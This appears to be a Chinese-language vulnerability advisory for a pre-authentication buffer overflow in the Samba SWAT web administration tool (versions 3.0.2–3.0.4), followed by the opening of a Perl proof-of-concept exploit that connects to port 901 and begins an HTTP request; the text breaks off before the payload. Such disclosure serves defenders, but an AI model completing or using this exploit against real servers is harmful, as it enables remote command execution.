受影响系统
Samba 3.0.2
Samba 3.0.3
Samba 3.0.4
详细描述
SWAT是Samba Web管理工具。
Samba SWAT服务预验证存在缓冲区溢出问题,远程攻击者可以利用这个漏洞在系统上以SWAT进程权限执行任意指令。问题存在于source/lib/util_str.c文件中的进行HTTP Basic验证的base64_decode_data_blob函数中.
测试代码
#!/usr/bin/perl
# Samba 3.0.4 and prior's SWAT Authorization Buffer Overflow
# Created by Noam Rathaus of Beyond Security Ltd.
#
use IO::Socket;
use strict;
my $host = $ARGV[0];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "901" );
unless ($remote) { die "cannot connect to http daemon on $host" }
print "connected/n";
$remote->autoflush(1);
my $http = "GET / HTTP/1.1/r
Host: $host:901/r
User-Agent: Mozilla/5.0